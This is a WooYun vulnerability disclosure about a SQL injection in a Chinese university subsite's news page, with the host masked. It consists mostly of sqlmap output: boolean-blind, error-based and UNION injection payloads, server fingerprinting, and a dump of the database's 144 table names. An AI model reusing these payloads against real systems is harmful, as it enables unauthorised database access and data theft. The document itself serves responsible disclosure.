
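Vulnerability summary

Bug ID: wooyun-2015-0152574

Title: SQL injection in a subsite of South-Central University for Nationalities (中南民族大学)

Vendor: CCERT (Education Network Emergency Response Team)

Author: 龍 、

Submitted: 2015-11-09 14:26

Fixed: 2015-11-22 11:18

Disclosed: 2015-11-22 11:18

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: Handed over to a third-party partner organization (CCERT, Education Network Emergency Response Team) for handling

Source: http://www.wooyun.org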



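Vulnerability details

Disclosure status:

2015-11-09: Details have been sent to the vendor; awaiting vendor handling
2015-11-22: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

RT (see title)

Detailed description: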

http://**.**.**.**/smkx/newsopen.php?id=184


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=184 AND 9426=9426
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=184 AND (SELECT 7771 FROM(SELECT COUNT(*),CONCAT(0x7173636d71,(SELECT (CASE WHEN (7771=7771) THEN 1 ELSE 0 END)),0x716e617071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=-2694 UNION ALL SELECT NULL,CONCAT(0x7173636d71,0x4b447362455959464a75,0x716e617071),NULL,NULL,NULL,NULL,NULL#
---
[14:13:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] smkx

Proof of vulnerability:

Database: smkx
[144 tables]
+---------------------------+
| option |
| admin |
| any_admin |
| any_attachment |
| any_categories |
| any_essay |
| any_log |
| any_role |
| any_user |
| g110 |
| genliuyan |
| ggao |
| guanli |
| haic |
| ip |
| ip_allow |
| js |
| jshu |
| md_smkx_admin888 |
| md_smkx_link |
| md_smkx_news |
| md_smkx_newscata |
| md_smkx_sigle |
| mdhy_admin888 |
| mdhy_link |
| mdhy_news |
| mdhy_newscata |
| mdhy_sigle |
| mdhy_temp |
| mdhy_vote |
| mdsky_admin888 |
| mdsky_book |
| mdsky_link |
| mdsky_news |
| mdsky_newscata |
| mdsky_newsold |
| new_class |
| phome_ecms_infoclass_news |
| phome_ecms_infotmp_news |
| phome_ecms_news |
| phome_ecms_newsutf8 |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqtemp |
| phome_enewsbuybak |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgroup |
| phome_enewsinfoclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslog |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewsplwords |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewssearch |
| phome_enewssearchtemp |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewstable |
| phome_enewstempvar |
| phome_enewsuser |
| phome_enewsvote |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| title |
| tpzt |
| wenjian |
| wlssys_admin888 |
| wlssys_book |
| wlssys_gustbook |
| wlssys_link |
| wlssys_news |
| wlssys_newscata |
| wlssys_newsold |
| xbswx_classdeclarecontent |
| xbswx_declarecate |
| xbswx_judge |
| xbswx_onlineuser |
| xbswx_select |
| xbswx_settings |
| xbswx_sitearticle |
| xbswx_sitebook |
| xbswx_sitecategory |
| xbswx_sitecourse |
| xbswx_sitefriendlink |
| xbswx_sitemodule |
| xbswx_statistic |
| xbswx_systemaction |
| xbswx_systemuser |
| xbswx_teacher |
| xbswx_video |
| xbswx_votes |
| xbswx_votetoplic |
| xdyqx_classdeclarecontent |
| xdyqx_declarecate |
| xdyqx_onlineuser |
| xdyqx_settings |
| xdyqx_sitearticle |
| xdyqx_sitebook |
| xdyqx_sitecategory |
| xdyqx_sitecourse |
| xdyqx_sitefriendlink |
| xdyqx_sitemodule |
| xdyqx_statistic |
| xdyqx_systemaction |
| xdyqx_systemuser |
| xdyqx_teacher |
| xdyqx_video |
| xdyqx_votes |
| xdyqx_votetoplic |
| xinxi |
| zhuye |
| ztlm |
+---------------------------+

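Remediation:

Copyright notice: when reposting, credit the source 龍 、@WooYun


Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored on: 2015-11-22 11:18

Vendor reply:

Latest status:

None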